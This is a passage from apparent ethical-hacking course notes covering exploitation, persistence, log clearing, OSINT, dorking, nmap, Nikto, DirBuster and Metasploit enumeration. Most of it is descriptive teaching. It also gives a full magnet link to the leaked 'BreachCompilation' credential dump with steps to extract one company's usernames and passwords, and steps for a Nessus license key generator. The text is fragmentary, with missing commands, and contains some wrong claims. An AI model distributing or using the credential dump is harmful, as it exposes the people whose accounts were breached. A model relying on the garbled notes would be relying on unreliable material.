Both scanning and enumeration are essential steps in security assessments and penetration testing,
allowing security professionals to identify vulnerabilities and attack vectors. They are also key
stages for attackers in gathering detailed information needed to launch more focused and targeted
attacks.
Gaining Access (also known as Exploitation) is a crucial phase in a penetration test, cyberattack, or
ethical hacking process. Where the information collected during reconnaissance, scanning, and
enumeration is used to exploit identified vulnerabilities.
To gain unauthorized access to a target system or network. This phase often marks the transition
from passive or preparatory activities to active exploitation of weaknesses.
46/129
Exploitation: Overview
The goal is to exploit a vulnerability to execute malicious code or take control of a system in some
way, either to perform further attacks or to assess the security posture of the system.
Types of Exploits
Exploitation can involve several types of attacks depending on the nature of the vulnerability. These
can range from exploiting open ports, weak services, software flaws, to social engineering attacks.
Here are the primary types:
Remote Exploits:
These involve attacks where the attacker does not need physical access to the target system. They
exploit vulnerabilities over a network connection (e.g., via the internet or a local network).
Examples:
Buffer Overflow Exploits: Attacking a system by sending more data than a program can handle,
causing it to overwrite adjacent memory and allowing an attacker to run arbitrary code.
Web Application Exploits: Exploiting vulnerabilities in web applications, such as SQL injection, cross-
site scripting (XSS), or remote code execution (RCE).
Local Exploits:
Local exploits occur when the attacker has some level of access to the target system. The attacker
can exploit a vulnerability from within the system (e.g., executing commands with higher privileges).
Examples:
Privilege Escalation: Exploiting a system flaw or misconfiguration to elevate a user’s privileges from
standard user to administrator or root.
Password Cracking: Gaining access by cracking weak or exposed passwords stored in a local system
file or database.
This form of exploitation leverages human psychology to trick individuals into providing sensitive
information or taking actions that lead to security breaches.
Examples:
Phishing: Sending fraudulent emails or messages to steal sensitive data (e.g., login credentials).
Pretexting: Pretending to be someone else (e.g., an IT admin) to trick employees into disclosing
47/129
information.
While primarily used for disruption rather than gaining access, these attacks involve exploiting
vulnerabilities to overwhelm a system or network, rendering it unavailable to legitimate users.
Password Attacks:
These attacks target weak or stolen passwords to gain unauthorized access to systems or accounts.
Exploitation often begins by cracking or guessing the password.
Examples:
Dictionary Attack: Using a precompiled list of common passwords to guess the correct one.
Credential Stuffing: Using previously leaked passwords and usernames to try and access other
accounts where users might have reused their credentials.
Various tools and techniques are used to exploit vulnerabilities and gain access to target systems.
Some of the most common methods include:
SQL Injection (SQLi): An attacker inserts malicious SQL code into input fields to manipulate the
database.
Cross-Site Scripting (XSS): Injecting malicious scripts into webpages viewed by users to steal session
cookies or redirect to malicious sites.
Remote Code Execution (RCE): Exploiting vulnerabilities in web applications to execute arbitrary
commands on a server.
Tools:
SQLmap: Automates the process of detecting and exploiting SQL injection flaws.
Burp Suite: A popular tool for web vulnerability scanning and exploitation, including XSS and RCE.
Metasploit: A framework that includes many exploits, including those for web applications.
RDP (Remote Desktop Protocol) Exploits: Exploiting weak configurations or vulnerabilities in RDP to
gain remote access to Windows machines.
48/129
Tools:
Hydra: A brute force tool used to guess passwords for various services, including SSH, RDP, and FTP.
Impacket: A collection of Python scripts that enable interaction with network protocols, such as SMB
and RDP.
Privilege Escalation:
After gaining initial access, attackers may exploit local vulnerabilities to escalate their privileges and
obtain full control of the system.
Methods:
Kernel Exploits: Exploiting bugs in the operating system kernel to gain root or administrator access.
Sudo Caching Attacks: If sudo permissions are improperly configured, an attacker might escalate
privileges by running commands as a higher-privileged user.
Tools:
LinPEAS (Linux Privilege Escalation Awesome Script): A tool that automates the process of finding
privilege escalation opportunities on Linux systems.
Windows Exploit Suggester: A tool that suggests Windows privilege escalation techniques based on
the OS version.
Metasploit Framework:
Metasploit can be used to automate the process of exploiting vulnerabilities, escalating privileges,
and maintaining access.
Exploit Modules: Used to launch exploits (e.g., exploiting a buffer overflow or RCE).
Post Exploitation Modules: Used to maintain access after exploiting a system, including creating
backdoors, keyloggers, and gathering credentials.
Auxiliary Modules: Used for scanning and gathering information but not directly exploiting
vulnerabilities.
Post-Exploitation
Once an attacker has successfully exploited a vulnerability and gained access, they often need to
49/129
maintain that access for further actions, such as data exfiltration, lateral movement, or privilege
escalation. This leads to the post-exploitation phase, which involves:
Maintaining Access: Establishing a backdoor or persistent access mechanism (e.g., creating a new
user account with admin privileges).
Privilege Escalation: If the attacker only has low-level access, they may attempt to escalate their
privileges to gain full control.
Lateral Movement: Moving to other systems in the network to expand the compromise.
Data Exfiltration: Stealing sensitive information, such as documents, passwords, or credit card data.
Mimikatz: A popular tool for extracting clear-text passwords from Windows machines.
Netcat: Used to establish a remote shell and maintain access to compromised systems.
Conclusion
The exploitation phase is a critical step in both offensive security assessments (such as penetration
testing) and malicious attacks.
This phase is highly dependent on the types of vulnerabilities present and the specific attack
methods used, from network-based exploits to privilege escalation and social engineering tactics.
4. Maintain Access
When you're conducting reconnaissance (recon) for penetration testing, ethical hacking, or other
cybersecurity assessments, maintaining access is an important part of the process.
However, it’s important to clarify that maintaining access should only be done in legal, ethical, and
authorized contexts (such as penetration testing with client permission or within a bug bounty
program). Unauthorized access to systems is illegal and unethical.
Here’s a breakdown of ways attackers or penetration testers might maintain access during recon,
which is useful for understanding tactics that could be used to secure systems against intrusion:
Exploiting Vulnerabilities: Finding weaknesses in the system, whether it’s an unpatched vulnerability
50/129
or a misconfiguration.
B. Creating Backdoors
Once access is gained, attackers or penetration testers will often establish persistent backdoors to
maintain access. Some of the methods include:
Web Shells: If an attacker can gain access to a web server, they might upload a web shell, which is a
script (usually PHP, ASP, etc.) that allows remote access to the server.
Reverse Shells: Attackers might use a reverse shell, where the target machine connects back to the
attacker's machine, allowing continuous access.
SSH Keys: Adding new SSH keys to the server to allow login without requiring passwords.
Trojans/Rootkits: Malicious software designed to stay hidden and maintain control of the
compromised system.
Metasploit: Metasploit's Meterpreter shell can be used to maintain access through payloads, as well
as to create a reverse shell, modify files, and run commands.
Cobalt Strike: A commercial penetration testing tool that provides advanced post-exploitation
features, including maintaining access and escalating privileges.
C. Escalating Privileges
To maintain access, an attacker often needs elevated privileges on a system to ensure they have
control over it and can persist:
Privilege Escalation: Attackers will attempt to escalate their privileges using tools or exploiting
known vulnerabilities in the system. This might involve exploiting a weakness to obtain root or
administrator access.
Clearing Logs: Deleting or modifying log files to remove evidence of the attacker's presence.
Hiding Malicious Code: Using obfuscation techniques or disguising the payloads to make detection
more difficult.
51/129
Rootkits and Anti-Forensics: Tools that hide malicious activity from administrators or intrusion
detection systems (IDS).
VPN or Proxy Setup: Configuring a VPN or proxy to route traffic through, which would obscure the
attacker’s real location and make it harder for defenders to detect the source.
C2 Servers: Setting up C2 infrastructure that allows the attacker to send commands to compromised
systems. Cobalt Strike, for example, often uses C2 infrastructure to control and manage
compromised hosts.
Creating New User Accounts: Adding new user accounts or modifying existing ones with elevated
privileges.
Install Persistent Services/Programs: Some attackers might install backdoors as system services or
create scheduled tasks that execute malicious programs regularly.
Modify Startup Files: Ensuring that a malicious program or backdoor is executed when the system
starts.
AutoRecon: A tool for automating reconnaissance, which can be useful for systematic enumeration
of a target.
BloodHound: A tool for Active Directory enumeration that can help attackers maintain access to
critical systems through privilege escalation.
DNS Tunneling: Using DNS queries and responses to exfiltrate data or receive commands, bypassing
network security monitoring.
ICMP Tunneling: Sending data via ICMP packets (ping requests), a method useful for bypassing
firewalls that block typical traffic.
Data Exfiltration: Using secure methods like encrypted tunnels or steganography to avoid detection
while transferring stolen data.
52/129
Lateral Movement: Moving from one system to another in the same network to expand the reach
and control within an organization.
Regular System Audits: Regular vulnerability assessments, system hardening, and patch
management can help mitigate the risk of an attacker gaining initial access.
Strong Authentication: Multi-factor authentication (MFA) can make it harder for attackers to gain
control over user accounts.
Endpoint Detection & Response (EDR): Tools that monitor and respond to suspicious activity on
endpoints, looking for signs of backdoors or malicious activity.
Network Monitoring: Tools that look for unusual network traffic patterns, such as communication with
C2 servers or DNS tunneling attempts.
Incident Response Plan: Ensure the ability to detect, contain, and respond to incidents rapidly.
Automated detection systems like SIEM (Security Information and Event Management) are essential
for real-time visibility.
Again, this is all assuming you’re conducting security research or penetration testing in an
authorized and ethical manner. Always ensure you have proper authorization before conducting
recon or attempting to maintain access to any system.
5. Covering Tracks
Covering tracks refers to the techniques used by attackers or penetration testers to erase or
obscure evidence of their activities to avoid detection. This is done to maintain access and avoid
raising alarms. Here are the key methods used:
Clearing Logs:
Delete or modify system logs (e.g., event logs, access logs) to remove traces of exploitation or
suspicious activity.
Tools like logcleaner or manual editing can be used to clear logs in Linux/Windows systems.
Hiding files or processes that are running on the system to prevent detection by security tools.
Using Rootkits:
Rootkits are malicious tools designed to hide the presence of malware by intercepting calls to the
operating system, making it harder to detect by security software or administrators.
They can hide files, processes, network connections, and even registry entries.
Obfuscation:
53/129
Masking or encoding malicious code (e.g., using polymorphic malware or packing tools) to avoid
detection by signature-based security systems like antivirus.
Tools that prevent forensic analysis, such as wiping disk sectors or manipulating timestamps (e.g.,
metasploit's mspacker can obfuscate payloads).
Disguising Malware:
Changing file names, disguising malware as legitimate files, or hiding them in innocuous-looking
locations (e.g., system directories).
Altering user or group permissions on sensitive files or directories to hide changes or prevent
detection by admins.
Sometimes attackers may insert fake evidence into logs or systems to mislead forensic
investigators.
Mitigation:
Regular Log Monitoring: Implementing real-time log monitoring can help detect unusual activities or
tampering.
File Integrity Monitoring: Tools that check file hashes regularly to spot unauthorized changes.
Endpoint Detection and Response (EDR): Solutions that look for signs of evasion techniques and
maintain visibility of critical system activities.
Covering tracks is a critical part of an attacker's strategy to avoid detection, but it also highlights the
need for robust security monitoring and detection systems to identify and prevent it.
Bugcrowd is a crowdsourced security platform. It was founded in 2012, and in 2019 it was one of the
largest bug bounty and vulnerability disclosure companies on the internet. Bugcrowd runs bug
bounty programs and also offers a range of penetration testing services it refers to as "Penetration
Testing as a Service" (PTaaS), as well as attack surface management.
Link:
https://www.bugcrowd.com/
The listed companys allow to pentest on bugcrowd. The bugbounty programs will found here.
54/129
Link:
https://bugcrowd.com/programs
HackerOne
It was one of the first companies to embrace and utilize crowd-sourced security and cybersecurity
researchers as linchpins of its business model; pioneering bug bounty and coordinated vulnerability
disclosure.
As of December 2022, HackerOne's network had paid over $230 million in bounties. HackerOne's
customers include The U.S. Department of Defense, General Motors, GitHub, Goldman Sachs,
Google, Hyatt, Lufthansa, Microsoft, MINDEF Singapore, Nintendo, PayPal, Slack, Twitter, and Yahoo.
Link:
https://www.hackerone.com/
The listed companys allow to pentest on hackerone. The bugbounty programs will found here.
Link:
https://hackerone.com/bug-bounty-programs
Rules to follow
1. Read the Guidelines for the programs
2. Provide details of the vulnerability, including information needed to reproduce and validate the
vulnerability and a Proof of Concept (POC)
In scope targets
In scope targets means what can do
Breach-parse:
55/129
A tool for parsing breached passwords. It refers to a tool or process that analyzes data logs or events
associated with a security breach to extract meaningful insights or patterns (e.g., identifying the
source of the breach, how it occurred, what was affected).
Breach-parse Link
https://github.com/Byte-Capsule-Ltd/breach-parse
https://github.com/hmaverickadams/breach-parse
magnet:?xt=urn:btih:
7ffbcd8cee06aba2ce6561688cf68ce2addca0a3&dn=BreachCompilation&tr=udp%3A%2F%2Ftrack
er.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.leechers-
paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Fgl
otorrents.pw%3A6969&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337
Step 1:
First Install qbittorrent if not install
Add the magnet link to qbittorrent
Step 2:
Now go to root
>> sudo su
Go to this path
# cd /opt/breach-parse
56/129
Note: It will take some time.
57/129
BreachCompilation tesla-master.txt tesla-users.txt
breach-parse.sh tesla-passwords.txt
58/129
To see with line number use this
59/129
That's it.
DeHashed provides free deep-web scans and protection against credential leaks. A modern personal
asset search engine created for security analysts, journalists, security companies, and everyday
people to help secure accounts.
60/129
Gather information from breach data
Have I Been Pwned allows you to search across multiple data breaches to see if your email address
or phone number has been compromised.
Shodan
https://www.shodan.io/
Shodan is a search engine that lets users search for various types of servers (webcams, routers,
servers, etc.) connected to the internet using a variety of filters.
[1] Some have also described it as a search engine of service banners, which is metadata that the
server sends back to the client.
[2] This can be information about the server software, what options the service supports, a welcome
message or anything else that the client can find out before interacting with the server.
Hunter
https://hunter.io/
Find email addresses and send cold emails. Hunter is the leading solution to find and verify
professional email addresses. Start using Hunter and connect with the people that matter for your
business.
Similar tools:
1. https://www.criminalip.io/en
2. https://search.censys.io/
3. https://www.zoomeye.hk/
4. https://ivre.rocks/
5. https://en.fofa.info/
6. https://wapiti-scanner.github.io/
7. https://weleakinfo.io/
8. https://www.onyphe.io/pricing#freemium
9. https://hunter.how/
2. crt.sh (website)
3. subfinder
Link:
https://github.com/projectdiscovery/subfinder
4. owasp amass
Link:
https://github.com/owasp-amass/amass
5. Tomnomnom
To check subdomains are live or not
Link:
https://github.com/tomnomnom/httprobe
62/129
19. EHP Identifying Website Technologies
BuiltWith tracks over 2500 eCommerce technologies across over 26 million eCommerce websites
backed with extensive exportable attributes including spend, revenue, employee count, social media
count, industry, location, rank and many more.
Link:
https://builtwith.com
Wappalyzer
Find out the technology stack of any website. Create lists of websites and contacts by the
technologies they use.
Link:
https://www.wappalyzer.com
Whatweb
Whatweb is a kali Linux tool. It is preinstalled on the os.
Command
63/129
1. https://portswigger.net/web-security/all-topics
2. https://www.vaadata.com/blog/introduction-to-burp-suite-the-tool-dedicated-to-web-application-
security/
3. https://dataspaceacademy.com/blog/burp-suite-overview-features-tools-and-benefits
4. https://tcm-sec.com/burp-suite-macros-a-hands-on-guide/
5. https://www.youtube.com/watch?v=slxHpp7ilYU
6. https://en.wikipedia.org/wiki/Burp_Suite
3. https://tcm-sec.com/burp-extension-development-part-1-setup-basics/
4. https://tcm-sec.com/burp-extension-dev-part-4-gui-design/
Week 5
Google Fu
Google Fu refers to the art of crafting advanced search queries to uncover specific information on
the internet. In the context of ethical hacking, Google Fu is used to identify vulnerabilities, gather
intelligence, and aid in penetration testing. Here are some key concepts and techniques:
Filetype: Search for specific file types (e.g., filetype:pdf for PDF files).
Inurl: Search for keywords within URLs (e.g., inurl:login for pages with “login” in the URL).
Intext: Search for keywords within page content (e.g., intext:"password" for pages containing the
word “password”).
Intitle: Search for keywords in page titles (e.g., intitle:"index of" for directory listings).
Link: Search for pages linking to a specific URL (e.g., link:http://example.com).
64/129
Information gathering: Search for sensitive information, such as credentials, configuration files, or
error messages.
Directory listing: Use intitle:"index of" to find directory listings, which can reveal file structures and
potential vulnerabilities.
File discovery: Search for specific file types (e.g., filetype:sql) or use inurl to find files with specific
names.
Best Practices
Use quotes: Enclose search terms in quotes to search for exact phrases.
Use the site operator: Limit searches to specific websites using the site: operator (e.g.,
site:example.com).
Use the OR operator: Combine search terms using the OR operator (e.g., password OR
credentials).
Be cautious: Avoid using Google Fu for malicious purposes, as it can be used to identify and exploit
vulnerabilities.
Google Advanced Search: Explore Google’s built-in advanced search features and operators.
Google Dorking Database: Access a comprehensive database of Google hacking queries and
examples.
Acunetix Web Vulnerability Scanner: Utilize an automated web vulnerability scanner to identify
and prioritize vulnerabilities.
Ethical Considerations
Obtain permission: Ensure you have permission to conduct Google Fu searches and testing on the
targeted systems.
Respect privacy: Avoid searching for sensitive information or targeting systems without explicit
permission.
Report findings: Document and report any identified vulnerabilities or issues to the system owners
or administrators.
By mastering Google Fu and adhering to ethical guidelines, ethical hackers can leverage these
advanced search techniques to aid in penetration testing, vulnerability identification, and
information gathering, ultimately improving the security and resilience of targeted systems.
Google Dorks
65/129
Link:
https://dorksearch.com/
https://dorkgenius.com/
Link:
https://taksec.github.io/google-dorks-bug-bounty/
https://x.com/TakSec
Social media plays a crucial role in ethical hacking’s information gathering phase. Ethical hackers
leverage social media platforms to gather valuable insights about their targets, including:
Employee profiles: Hackers can identify employees, their roles, and connections, which helps in
understanding the organization’s structure and potential attack vectors.
Company information: Social media platforms often provide publicly available information about a
company, such as its products, services, and mission statements.
Network and system details: Hackers can gather information about a company’s network
infrastructure, including IP addresses, subdomains, and open ports.
Employee behavior: Observing employee behavior on social media can help hackers identify
potential vulnerabilities, such as weak passwords or phishing susceptibility.
Company culture: Social media can provide insights into a company’s culture, including its values,
policies, and security practices.
Several tools and techniques are used to gather information from social media platforms:
Recon-ng: A web reconnaissance framework that extracts information from social media platforms,
online databases, and web sources.
SpiderFoot: An open-source OSINT automation tool that collects information from various sources,
including social media, DNS, WHOIS, and threat intelligence feeds.
66/129
Google Fu: A search engine optimization (SEO) technique used to gather information from publicly
available sources, including social media profiles and company websites.
Best Practices
When utilizing social media for information gathering in ethical hacking, it’s essential to:
Respect privacy: Only gather publicly available information and avoid accessing private profiles or
data without explicit permission.
Use automated tools responsibly: Ensure that automated tools are configured to respect privacy
settings and avoid overwhelming social media platforms with requests.
Document findings: Keep detailed records of gathered information to facilitate analysis and
reporting.
Maintain ethical boundaries: Avoid using gathered information for malicious purposes and
prioritize the ethical hacking framework’s principles.
By leveraging social media effectively, ethical hackers can gather valuable information about their
targets, improving the accuracy and efficiency of their assessments and ultimately enhancing the
organization’s security posture.
Social media has become a valuable tool for gathering information about individuals. This can be
done through various means, including:
Social media profiles (e.g., Facebook, Twitter, LinkedIn) often contain publicly available information,
such as:
• Biographical details (name, age, location, occupation)
• Interests and hobbies
• Friends and connections
• Posts and updates (which can provide insights into their thoughts, opinions, and behaviors)
2. Social Listening
Social listening involves monitoring social media conversations about a specific individual,
organization, or topic. This can help gather information on:
• Mentions and references to the person
• Opinions and sentiments expressed about them
• Relevant discussions and topics they participate in
Many social media platforms provide APIs (Application Programming Interfaces) that allow
developers to access and collect data. Tools like:
• Twitter Streaming API
• Facebook Graph API
• LinkedIn API
67/129
• Social media listening tools (e.g., Hootsuite, Sprout Social)
+ Profile information
+ Post and update history
+ Engagement metrics (likes, comments, shares)
+ Network and connection data
Sentiment analysis and opinion mining involve using algorithms to analyze the tone and sentiment
of social media posts about an individual. This can help identify:
• Positive and negative opinions about the person
• Trends and patterns in public perception
• Potential areas of concern or controversy
5. Contextual Analysis
Contextual analysis involves examining the broader context in which social media conversations
about an individual take place. This can include:
• Identifying influencers and key opinion leaders
• Analyzing the role of hashtags and keywords
• Understanding the impact of events and news on public perception
Ethical Considerations
When gathering information about an individual through social media, it’s essential to consider
ethical implications, such as:
• Respect for privacy and personal boundaries
• Avoiding harassment or targeted attacks
• Ensuring data collection and analysis are transparent and compliant with platform terms and
regulations
Best Practices
To effectively utilize social media for information gathering on a person, follow these best practices:
• Clearly define the purpose and scope of the information gathering
• Use publicly available information and APIs whenever possible
• Respect privacy boundaries and avoid collecting sensitive or personal data
• Analyze and interpret data in a responsible and unbiased manner
By understanding these methods and best practices, you can effectively utilize social media for
information gathering on a person while maintaining ethical standards.
OSINT Fundamentals
Open-Source Intelligence (OSINT) refers to the collection, analysis, and dissemination of publicly
available information from various sources, including the internet, social media, news articles, and
68/129
other publicly accessible data. OSINT is a crucial component of intelligence gathering, as it provides
valuable insights and information without requiring access to classified or proprietary data.
Key Concepts:
1. Publicly Available Information (PAI): Information that is freely accessible and can be found
through online searches, news articles, and other publicly available sources.
2. Open-Source Intelligence (OSINT): The process of collecting, analyzing, and disseminating PAI
to support intelligence operations, decision-making, and situational awareness.
4. Information Quality: Evaluating the reliability and credibility of PAI to ensure accurate and
trustworthy insights.
OSINT Techniques:
1. Search Engine Optimization (SEO): Utilizing search engines to their full potential, including
advanced search operators and syntax.
2. Social Media Analysis: Collecting and analyzing data from social media platforms to identify
trends, sentiment, and potential threats.
3. Web Scraping: Extracting data from websites and online sources using specialized tools and
techniques.
4. Historical Research: Gathering and analyzing historical information to identify patterns, trends,
and potential risks.
OSINT Tools:
1. Maltego: A popular OSINT tool for collecting and analyzing data from various sources, including
social media and the dark web.
2. Spiderfoot: A tool for automating OSINT tasks, including search engine queries and web
scraping.
3. Custom Python Tools: Utilizing Python programming language to create custom OSINT tools
and scripts.
Best Practices:
1. Curiosity and Passion: Developing a curiosity-driven approach to OSINT, with a passion for
continuous learning and improvement.
2. Ethical Considerations: Adhering to ethical guidelines when collecting and analyzing PAI,
ensuring responsible and respectful use of publicly available information.
69/129
3. Continuous Training: Staying up-to-date with the latest OSINT techniques, tools, and trends
through ongoing training and professional development.
Real-World Applications:
1. Cyber Threat Intelligence: Identifying and monitoring cyber threats, vulnerabilities, and
incident response efforts using OSINT.
• Importance of OSINT in Ethical Hacking: OSINT is a crucial step in the ethical hacking process,
as it allows hackers to gather information about a target without having to resort to more invasive or
malicious methods. By using OSINT, ethical hackers can identify potential vulnerabilities and
weaknesses, and then use that information to simulate an attack and test the target’s defenses.
• OSINT Techniques and Tools: There are a variety of OSINT techniques and tools available,
including Google Dorking, metadata analysis, and social media analysis. These tools and techniques
can be used to gather information about a target, including their IP address, domain name, and other
relevant details. Some popular OSINT tools include Maltego, Shodan, and TheHarvester.
• Ethical Considerations: When using OSINT for ethical hacking, it’s essential to consider the
ethical implications of gathering and analyzing information from publicly available sources. Ethical
hackers must ensure that they are not violating any laws or regulations, and that they are respecting
the privacy and security of the target organization or individual.
• Best Practices for OSINT in Ethical Hacking: To get the most out of OSINT in ethical hacking,
it’s essential to follow best practices, such as defining clear objectives, using automated tools, and
verifying the accuracy of the information gathered. Additionally, ethical hackers should stay up-to-
date with the latest OSINT tools and techniques, and be aware of the potential risks and limitations of
using OSINT in ethical hacking.
For More
70/129
https://www.youtube.com/watch?v=FS9j131Gq-M
Week 6
https://nmap.org/book/man-port-scanning-techniques.html
Support Group
"Mastering Nmap: Essential Commands for Network Scanning and Recon for Hacking"
1. Scan a single IP
>> nmap 192.168.1.1
Performs a simple scan on the specified IP address.
71/129
>> nmap --script http-title 192.168.1.1
Runs the http-title script to extract the title of a web page.
17. Netdiscover
>> netdiscover -i eth0 -r 192.168.1.0/24
performs a ping scan (host discovery) on the local network 192.168.1.0/24. This subnet range
includes IP addresses from 192.168.1.0 to 192.168.1.255.
For more
https://www.youtube.com/playlist?list=PLOSJSv0hbPZAAeHUSEcq5lG6NkIqOGcb4
https://medium.com/@zisansakibhaque/network-scanning-101-c47c655f2d98
72/129
what can be done by insecure http method
--> nmap -Pn -sV -P 80 -T4 --script http-methods -script-args http-methods.test=all bytecapsuleit.com
________________________________________
---------------- OUTPUT ----------------
________________________________________
--> nmap -Pn -sV -P 80 -T4 --script http-methods -script-args http-methods.test=all
bytecapsuleit.com
73/129
First check victim machine IP
command
>> ip address
74/129
To find hidden file and directories
75/129
Let's check the /test/ Test page
76/129
Let's check the /phpMyAdmin/
77/129
We see the information. Now it's time to brouteforce. In here we will use Nikto and dirbuster
What is Nikto
Nikto is an open-source web server scanner and vulnerability assessment tool designed to identify
potential security issues in web servers and web applications. It performs comprehensive tests
against web servers, checking for:
1. Outdated software: Nikto checks for outdated versions of web server software, including HTTP
servers, web applications, and other related components.
2. Configuration errors: The tool examines server configuration files and settings for potential
mistakes or security vulnerabilities.
3. Vulnerable files and programs: Nikto scans for known vulnerable files and programs, such as CGI
scripts, PHP files, and other executable code.
4. Server misconfigurations: It checks for incorrect or missing server settings, like HTTP headers,
index files, and server options.
5. SSL/TLS issues: Nikto can also scan for SSL/TLS certificate-related security issues, including cipher
suite weaknesses and certificate expiration dates.
Nikto’s output includes a detailed report listing the identified issues, along with recommendations for
remediation. This information helps security professionals, system administrators, and penetration
testers to:
78/129
• Identify and prioritize security vulnerabilities
• Remediate issues to improve web server security
• Conduct thorough security assessments and audits
Nikto is a command-line interface (CLI) tool, available for Linux, Windows, and macOS platforms. Its
flexibility and customizability make it a popular choice among security professionals and web
developers.
nikto -h means the host. It specifies the target web server’s IP address or hostname to be scanned by
Nikto.
command
What is dirbuster
DirBuster: A multi-threaded Java application designed to brute-force directories and files names on
web/application servers. Its primary goal is to find hidden files and directories on web servers, often
overlooked in default installations.
79/129
1. List-based brute force: DirBuster comes with 9 pre-generated lists of common directory and file
names, crawled from the internet and compiled based on actual usage by developers. This approach
makes it effective at finding hidden files and directories.
2. Pure brute force: Additionally, DirBuster offers a pure brute-force option, allowing users to specify
a custom wordlist or perform a blind brute-force attack.
4. Options: Users can customize DirBuster’s behavior by specifying options such as:
• Target URL
• Wordlist (default or custom)
• GET or HEAD request method
• Thread count
• Start point of the scan
• Verbose output
• File extension filtering
• Recursive scanning
• Report file output
DirBuster is a powerful tool for web penetration testers and security researchers, helping them
discover hidden files and directories on web servers. Its effectiveness relies on the quality of its pre-
generated lists and the user’s ability to customize its behavior to suit their specific needs.
To start DirBuster
>> dirbuster
Target Url
http://192.168.231.152:80/
Go to
• click on (Browse)
• from Look in select (/)
• then select (usr)
• then select (share)
• then find (wordlists)
• then select (dirbuster)
• then choose as your need
80/129
81/129
Results - List View
82/129
83/129
84/129
85/129
27. EHP Enumerating SMB
Enumerating SMB
SMB stands for Server Message Block, a protocol used for sharing files, printers, and other resources
over a network. It's widely used in Windows environments but is also supported by other operating
systems like Linux and macOS.
1. File Sharing: Allows users to access, read, and write files on remote servers as if they were on the
local machine.
3. Network Browsing: Provides the ability to discover and access resources available on a network.
4. Authentication and Permissions: Ensures secure access by requiring users to authenticate and
restricting access based on permissions.
Common Uses:
SMB Versions:
1. SMB 1.0: The original version, now outdated and considered insecure.
2. SMB 2.0: Introduced in Windows Vista and Server 2008, offering improved performance and
security.
3. SMB 3.0 and newer: Enhanced with encryption, performance improvements, and failover support.
Common in modern Windows systems.
Metasploit framework
Metasploit is a powerful open-source penetration testing framework used to discover, exploit, and
validate vulnerabilities in systems. It provides tools for creating and executing exploit code, as well
as for simulating real-world attacks to test system security.
Key Features:
86/129
• Exploitation: Helps find and exploit vulnerabilities in networks and applications.
• Payloads: Delivers scripts (like Meterpreter) to interact with or control compromised systems.
• Modules: Includes exploits, auxiliary tools (e.g., for scanning), and post-exploitation tools.
• Automation: Enables scripting and repeatable testing processes.
• Community Contributions: Regularly updated with new exploits and features.
Metasploit is popular among ethical hackers, security researchers, and even malicious actors,
making it essential to learn for cybersecurity professionals.
>> msfconsole
87/129
Now in msfconsole
88/129
We need scanning
224 auxiliary/scanner/smb/smb_ms17_010
89/129
Now select auxiliary/scanner/smb/smb_ms17_010
Which is in 224 number
To select auxiliary/scanner/smb/smb_ms17_010
Command
To check what is in it
90/129
Now set RHOSTS (Remote Host)
command
command
91/129
Now try smbclient to find vulnerability.
To start smbclient
command
>> smbclient
command
To check host
command
92/129
Here we will use IPC$ (we can also choose any options)
93/129
28. EHP Enumerating SSH
Enumerating SSH
Secure Shell (SSH) is a cryptographic network protocol that enables secure remote access to and
management of computers, servers, and other network devices over an unsecured network. It
provides a secure connection by encrypting data and authenticating users, ensuring the
confidentiality and integrity of transmitted data.
Key Features:
• Encryption: SSH encrypts all data transmitted between the client and server, making it difficult
for unauthorized parties to intercept and read or modify the data.
• Port forwarding: SSH allows for tunneling or port forwarding, enabling data packets to traverse
networks that would otherwise block them.
• Secure remote access: SSH enables administrators to access and manage remote devices,
servers, and networks securely, without exposing sensitive data to unauthorized parties.
Common Uses:
Port Number: SSH typically uses port 22, but this can be changed during configuration.
Enumerating SSH
>> msfconsole
94/129
In metasploit search for ssh
95/129
now select Number 15
To check it
96/129
In here RHOSTS is not set. RPORT is set which is 22
97/129
Now run the module to see the information we get
98/129
Video time 05:53
Week 07
99/129
30. EHP Scanning with Nessus Part 1
Install it
>> dpkg -i Nessus-10.8.3-debian10_amd64.deb
Step-2
Go to for more info
https://github.com/harshdhamaniya/nessuskeygen
Step-3
Stop Nessus:
>> systemctl stop nessusd
>> cd nessuskeygen
Copy the activation code and use it. (It will valid for 5 days)
Step-4
Updating the Nessus Key
To update the Nessus key, you can use the following commands:
>> nessuscli fix --reset-all (for first time no need to run this command)
>> /opt/nessus/sbin/nessuscli fetch --register xxxx-xxxx-xxxx-xxxx
Step-5
Start Nessus:
>> systemctl start nessusd
100/129
31. EHP Scanning with Nessus Part 2
A reverse shell or connect-back is a setup, where the attacker must first start the server on his
machine, while the target machine will have to act as a client that connects to the server served by
the attacker. After the successful connection, the attacker can gain access to the shell of the target
computer.
To launch a Reverse shell, the attacker doesn’t need to know the IP address of the victim to access
the target computer.
Bind Shell
A bind shell is a sort of setup where remote consoles are established with other computers over the
network. In Bind shell, an attacker launches a service on the target computer, to which the attacker
101/129
can connect. In a bind shell, an attacker can connect to the target computer and execute commands
